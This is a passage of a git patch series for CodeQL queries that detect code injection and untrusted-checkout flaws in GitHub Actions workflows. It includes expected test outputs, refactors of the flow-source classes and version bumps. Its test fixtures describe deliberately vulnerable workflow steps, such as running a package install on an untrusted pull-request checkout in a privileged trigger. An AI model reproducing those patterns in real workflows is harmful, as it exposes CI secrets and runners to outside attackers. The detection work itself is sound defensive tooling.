.github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index e60664795762..e13c2b80a72f 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -206,6 +206,11 @@ edges | .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | provenance | | | .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | provenance | | | .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | provenance | | +| .github/workflows/test27.yml:19:7:21:4 | Job outputs node [chart-version] | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | provenance | | +| .github/workflows/test27.yml:20:23:20:68 | steps.get-version.outputs.chart_version | .github/workflows/test27.yml:19:7:21:4 | Job outputs node [chart-version] | provenance | | +| .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:43:14:44:66 | echo "chart_version=$(> $GITHUB_OUTPUT shell: bash - run: python2.7 foo.py + - run: pip install --no-deps . diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 3b433ec02f17..111edb7646df 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -210,7 +210,8 @@ edges | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | -| .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | .github/workflows/test7.yml:59:9:59:30 | Run Step | +| .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | .github/workflows/test7.yml:59:9:60:6 | Run Step | +| .github/workflows/test7.yml:59:9:60:6 | Run Step | .github/workflows/test7.yml:60:9:60:37 | Run Step | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | @@ -351,7 +352,8 @@ edges | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:59:9:59:30 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:59:9:59:30 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:59:9:60:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:59:9:60:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:60:9:60:37 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:60:9:60:37 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | | .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | pull_request_target | | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | | .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | From 9a137db12bbd01402c897653f32e896f767f2f29 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 20 Nov 2024 15:36:20 +0100 Subject: [PATCH 678/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index b72f94d1bb15..d938d0617e9a 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.2.0 +version: 0.2.1 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a9f045567b0b..99ac2c740119 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.2.0 +version: 0.2.1 groups: [actions, queries] suites: codeql-suites extractor: javascript From 1fa00f106532e3db0457368d78a9f187ac9d61ee Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 14:31:10 +0100 Subject: [PATCH 679/707] Capture the event name rathen than the whole event --- .../codeql/actions/dataflow/FlowSources.qll | 52 ++++++++++--------- .../Security/CWE-094/CodeInjectionCritical.ql | 2 +- 2 files changed, 28 insertions(+), 26 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index cf1763b1c03c..9259f18f108c 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -19,22 +19,26 @@ abstract class RemoteFlowSource extends SourceNode { abstract string getSourceType(); /** Gets the event that triggered the source. */ - abstract Event getEvent(); + abstract string getEventName(); override string getThreatModel() { result = "remote" } } +/** + * A data flow source of user input from github context. + * eg: github.head_ref + */ class GitHubCtxSource extends RemoteFlowSource { string flag; - Event event; + string event; GitHubCtxSource() { exists(Expression e, string context, string context_prefix | this.asExpr() = e and context = e.getExpression() and - event = e.getEnclosingWorkflow().getATriggerEvent() and normalizeExpr(context) = "github.head_ref" and - contextTriggerDataModel(event.getName(), context_prefix) and + event = e.getEnclosingWorkflow().getATriggerEvent().getName() and + contextTriggerDataModel(event, context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") and flag = "branch" ) @@ -42,23 +46,23 @@ class GitHubCtxSource extends RemoteFlowSource { override string getSourceType() { result = flag } - override Event getEvent() { result = event } + override string getEventName() { result = event } } class GitHubEventCtxSource extends RemoteFlowSource { string flag; string context; - Event event; + string event; GitHubEventCtxSource() { exists(Expression e, string regexp | this.asExpr() = e and context = e.getExpression() and - event = e.getATriggerEvent() and + event = e.getATriggerEvent().getName() and ( // the context is available for the job trigger events exists(string context_prefix | - contextTriggerDataModel(event.getName(), context_prefix) and + contextTriggerDataModel(event, context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) or @@ -74,7 +78,7 @@ class GitHubEventCtxSource extends RemoteFlowSource { string getContext() { result = context } - override Event getEvent() { result = event } + override string getEventName() { result = event } } abstract class CommandSource extends RemoteFlowSource { @@ -82,7 +86,7 @@ abstract class CommandSource extends RemoteFlowSource { abstract Run getEnclosingRun(); - override Event getEvent() { result = this.getEnclosingRun().getATriggerEvent() } + override string getEventName() { result = this.getEnclosingRun().getATriggerEvent().getName() } } class GitCommandSource extends RemoteFlowSource, CommandSource { @@ -172,19 +176,19 @@ class GitHubEventPathSource extends RemoteFlowSource, CommandSource { class GitHubEventJsonSource extends RemoteFlowSource { string flag; - Event event; + string event; GitHubEventJsonSource() { exists(Expression e, string context, string regexp | this.asExpr() = e and context = e.getExpression() and - event = e.getEnclosingWorkflow().getATriggerEvent() and + event = e.getEnclosingWorkflow().getATriggerEvent().getName() and untrustedEventPropertiesDataModel(regexp, _) and ( // only contexts for the triggering events are considered tainted. // eg: for `pull_request`, we only consider `github.event.pull_request` exists(string context_prefix | - contextTriggerDataModel(event.getName(), context_prefix) and + contextTriggerDataModel(event, context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) and normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp(regexp) + ".*") @@ -199,7 +203,7 @@ class GitHubEventJsonSource extends RemoteFlowSource { override string getSourceType() { result = flag } - override Event getEvent() { result = event } + override string getEventName() { result = event } } /** @@ -212,7 +216,7 @@ class MaDSource extends RemoteFlowSource { override string getSourceType() { result = sourceType } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } abstract class FileSource extends RemoteFlowSource { } @@ -225,20 +229,18 @@ class ArtifactSource extends RemoteFlowSource, FileSource { override string getSourceType() { result = "artifact" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } /** * A file from an untrusted checkout. */ private class CheckoutSource extends RemoteFlowSource, FileSource { - Event event; - CheckoutSource() { this.asExpr() instanceof SimplePRHeadCheckoutStep } override string getSourceType() { result = "artifact" } - override Event getEvent() { result = event } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } /** @@ -255,7 +257,7 @@ class DornyPathsFilterSource extends RemoteFlowSource { override string getSourceType() { result = "filename" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } /** @@ -278,7 +280,7 @@ class TJActionsChangedFilesSource extends RemoteFlowSource { override string getSourceType() { result = "filename" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } /** @@ -301,7 +303,7 @@ class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { override string getSourceType() { result = "filename" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } class Xt0rtedSlashCommandSource extends RemoteFlowSource { @@ -315,7 +317,7 @@ class Xt0rtedSlashCommandSource extends RemoteFlowSource { override string getSourceType() { result = "text" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } class ZenteredIssueFormBodyParserSource extends RemoteFlowSource { @@ -329,7 +331,7 @@ class ZenteredIssueFormBodyParserSource extends RemoteFlowSource { override string getSourceType() { result = "text" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } class OctokitRequestActionSource extends RemoteFlowSource { @@ -352,5 +354,5 @@ class OctokitRequestActionSource extends RemoteFlowSource { override string getSourceType() { result = "text" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index b52c07023443..c4ab00837ca7 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -23,7 +23,7 @@ from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Event where CodeInjectionFlow::flowPath(source, sink) and inPrivilegedContext(sink.getNode().asExpr(), event) and - source.getNode().(RemoteFlowSource).getEvent() = event and + source.getNode().(RemoteFlowSource).getEventName() = event.getName() and not exists(ControlCheck check | check.protects(sink.getNode().asExpr(), event, "code-injection")) and // exclude cases where the sink is a JS script and the expression uses toJson not exists(UsesStep script | From ef713ff13bbd387d51e073fff03efde41f814357 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 17:30:10 +0100 Subject: [PATCH 680/707] Extract GitHub context access expression into its own class --- ql/lib/codeql/actions/Ast.qll | 2 + ql/lib/codeql/actions/ast/internal/Ast.qll | 108 ++++++++++++++------- 2 files changed, 76 insertions(+), 34 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index ad7bd67a18c8..8c1925f3288c 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -379,6 +379,8 @@ class JsonReferenceExpression extends AstNode instanceof JsonReferenceExpression string getInnerExpression() { result = super.getInnerExpression() } } +class GitHubExpression extends SimpleReferenceExpression instanceof GitHubExpressionImpl { } + class SecretsExpression extends SimpleReferenceExpression instanceof SecretsExpressionImpl { } class StepsExpression extends SimpleReferenceExpression instanceof StepsExpressionImpl { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index e5ad86a226c8..e331eff9bd29 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1540,25 +1540,27 @@ string getAJsonReferenceAccessPath(string s, int offset) { * A ${{}} expression accessing a sigcle context variable such as steps, needs, jobs, env, inputs, or matrix. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability */ -abstract class SimpleReferenceExpressionImpl extends ExpressionImpl { - string expression; - +class SimpleReferenceExpressionImpl extends ExpressionImpl { SimpleReferenceExpressionImpl() { + exists(getASimpleReferenceExpression(this.getFullExpression(), _)) + or + exists(getAJsonReferenceExpression(this.getFullExpression(), _)) + } + + override string getExpression() { ( - expression = getASimpleReferenceExpression(this.getFullExpression(), _) + result = getASimpleReferenceExpression(this.getFullExpression(), _) or exists(getAJsonReferenceExpression(this.getFullExpression(), _)) and - expression = this.getFullExpression() + result = this.getFullExpression() ) } - override string getExpression() { result = expression } - abstract string getFieldName(); abstract AstNodeImpl getTarget(); - override string toString() { result = expression } + override string toString() { result = this.getFullExpression() } } class JsonReferenceExpressionImpl extends ExpressionImpl { @@ -1597,6 +1599,44 @@ private string inputsCtxRegex() { private string secretsCtxRegex() { result = wrapRegexp("secrets\\.([A-Za-z0-9_-]+)") } +private string githubCtxRegex() { + result = wrapRegexp("github\\.([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)") +} + +/** + * Holds for an expression accesing the `github` context. + * e.g. `${{ github.head_ref }}` + */ +class GitHubExpressionImpl extends SimpleReferenceExpressionImpl { + GitHubExpressionImpl() { + exists(string expr | + ( + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) + ) and + expr.regexpMatch(githubCtxRegex()) + ) + } + + override string getFieldName() { + exists(string expr | + ( + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) + ) and + result = expr.regexpCapture(githubCtxRegex(), 1) + ) + } + + override AstNodeImpl getTarget() { none() } +} + /** * Holds for an expression accesing the `secrets` context. * e.g. `${{ secrets.FOO }}` @@ -1607,11 +1647,11 @@ class SecretsExpressionImpl extends SimpleReferenceExpressionImpl { SecretsExpressionImpl() { exists(string expr | ( - exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) or - exists(getASimpleReferenceExpression(expression, _)) and - expr = normalizeExpr(expression) + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) ) and expr.regexpMatch(secretsCtxRegex()) and fieldName = expr.regexpCapture(secretsCtxRegex(), 1) @@ -1635,11 +1675,11 @@ class StepsExpressionImpl extends SimpleReferenceExpressionImpl { StepsExpressionImpl() { exists(string expr | ( - exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or - exists(getASimpleReferenceExpression(expression, _)) and - expr = normalizeExpr(expression) + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) ) and expr.regexpMatch(stepsCtxRegex()) and stepId = expr.regexpCapture(stepsCtxRegex(), 1) and @@ -1676,11 +1716,11 @@ class NeedsExpressionImpl extends SimpleReferenceExpressionImpl { NeedsExpressionImpl() { exists(string expr | ( - exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or - exists(getASimpleReferenceExpression(expression, _)) and - expr = normalizeExpr(expression) + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) ) and expr.regexpMatch(needsCtxRegex()) and fieldName = expr.regexpCapture(needsCtxRegex(), 2) and @@ -1720,11 +1760,11 @@ class JobsExpressionImpl extends SimpleReferenceExpressionImpl { JobsExpressionImpl() { exists(string expr | ( - exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or - exists(getASimpleReferenceExpression(expression, _)) and - expr = normalizeExpr(expression) + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) ) and expr.regexpMatch(jobsCtxRegex()) and jobId = expr.regexpCapture(jobsCtxRegex(), 1) and @@ -1752,8 +1792,8 @@ class InputsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; InputsExpressionImpl() { - normalizeExpr(expression).regexpMatch(inputsCtxRegex()) and - fieldName = normalizeExpr(expression).regexpCapture(inputsCtxRegex(), 1) + normalizeExpr(this.getExpression()).regexpMatch(inputsCtxRegex()) and + fieldName = normalizeExpr(this.getExpression()).regexpCapture(inputsCtxRegex(), 1) } override string getFieldName() { result = fieldName } @@ -1779,11 +1819,11 @@ class EnvExpressionImpl extends SimpleReferenceExpressionImpl { EnvExpressionImpl() { exists(string expr | ( - exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or - exists(getASimpleReferenceExpression(expression, _)) and - expr = normalizeExpr(expression) + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) ) and expr.regexpMatch(envCtxRegex()) and fieldName = expr.regexpCapture(envCtxRegex(), 1) @@ -1814,11 +1854,11 @@ class MatrixExpressionImpl extends SimpleReferenceExpressionImpl { MatrixExpressionImpl() { exists(string expr | ( - exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or - exists(getASimpleReferenceExpression(expression, _)) and - expr = normalizeExpr(expression) + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) ) and expr.regexpMatch(matrixCtxRegex()) and fieldAccess = expr.regexpCapture(matrixCtxRegex(), 1) From 3591db9e9cdfaa05a8b8bf6becb1f1fb83c2cdcd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 17:32:09 +0100 Subject: [PATCH 681/707] Remove artifact source as a source of PR refs --- .../security/UntrustedCheckoutQuery.qll | 26 ++++++++++++------- 1 file changed, 16 insertions(+), 10 deletions(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 1a75f8a96c16..12a65a52baaf 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -15,8 +15,6 @@ private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { ( // remote flow sources - source instanceof ArtifactSource - or source instanceof GitHubCtxSource or source instanceof GitHubEventCtxSource @@ -245,10 +243,14 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt exists(string value, Expression expr | value.regexpMatch(".*(head|branch|ref).*") and expr = this.getArgumentExpr("ref") | - expr.(StepsExpression).getStepId() = value or - expr.(SimpleReferenceExpression).getFieldName() = value or - expr.(NeedsExpression).getNeededJobId() = value or - expr.(JsonReferenceExpression).getAccessPath() = value or + expr.(StepsExpression).getStepId() = value + or + expr.(SimpleReferenceExpression).getFieldName() = value + or + expr.(NeedsExpression).getNeededJobId() = value + or + expr.(JsonReferenceExpression).getAccessPath() = value + or expr.(JsonReferenceExpression).getInnerExpression() = value ) ) @@ -275,10 +277,14 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { exists(string value, Expression expr | value.regexpMatch(".*(head|sha|commit).*") and expr = this.getArgumentExpr("ref") | - expr.(StepsExpression).getStepId() = value or - expr.(SimpleReferenceExpression).getFieldName() = value or - expr.(NeedsExpression).getNeededJobId() = value or - expr.(JsonReferenceExpression).getAccessPath() = value or + expr.(StepsExpression).getStepId() = value + or + expr.(SimpleReferenceExpression).getFieldName() = value + or + expr.(NeedsExpression).getNeededJobId() = value + or + expr.(JsonReferenceExpression).getAccessPath() = value + or expr.(JsonReferenceExpression).getInnerExpression() = value ) ) From f3ada4a92b32b6444755339843600b70ba524e6e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 17:32:26 +0100 Subject: [PATCH 682/707] Update CompositeActionSources expected file --- .../query-tests/Models/CompositeActionsSources.expected | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/ql/test/query-tests/Models/CompositeActionsSources.expected b/ql/test/query-tests/Models/CompositeActionsSources.expected index 87c185fb5e12..3be74bb8bf12 100644 --- a/ql/test/query-tests/Models/CompositeActionsSources.expected +++ b/ql/test/query-tests/Models/CompositeActionsSources.expected @@ -1,12 +1,21 @@ edges +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | provenance | | | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | provenance | | | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | provenance | | | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | provenance | | nodes +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | semmle.label | steps.reflector.outputs.reflected | | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | semmle.label | steps.source.outputs.tainted | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | semmle.label | Run Step: reflector [reflected] | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | | action1/action.yml:42:7:44:4 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | semmle.label | Run Step: source [tainted] | | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | subpaths #select +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | From f6d20195b1e710240e461d8edd771d978488f073 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 17:33:13 +0100 Subject: [PATCH 683/707] When trigger event is not known, do not check context trigger maps --- .../codeql/actions/dataflow/FlowSources.qll | 32 ++++++++++++------- 1 file changed, 20 insertions(+), 12 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 9259f18f108c..df3d513d0050 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -31,16 +31,19 @@ abstract class RemoteFlowSource extends SourceNode { class GitHubCtxSource extends RemoteFlowSource { string flag; string event; + GitHubExpression e; GitHubCtxSource() { - exists(Expression e, string context, string context_prefix | - this.asExpr() = e and - context = e.getExpression() and - normalizeExpr(context) = "github.head_ref" and - event = e.getEnclosingWorkflow().getATriggerEvent().getName() and - contextTriggerDataModel(event, context_prefix) and - normalizeExpr(context).matches("%" + context_prefix + "%") and - flag = "branch" + this.asExpr() = e and + // github.head_ref + e.getFieldName() = "head_ref" and + flag = "branch" and + ( + event = e.getATriggerEvent().getName() and + event = "pull_request_target" + or + not exists(e.getATriggerEvent()) and + event = "unknown" ) } @@ -58,15 +61,16 @@ class GitHubEventCtxSource extends RemoteFlowSource { exists(Expression e, string regexp | this.asExpr() = e and context = e.getExpression() and - event = e.getATriggerEvent().getName() and ( // the context is available for the job trigger events + event = e.getATriggerEvent().getName() and exists(string context_prefix | contextTriggerDataModel(event, context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) or - exists(e.getEnclosingCompositeAction()) + not exists(e.getATriggerEvent()) and + event = "unknown" ) and 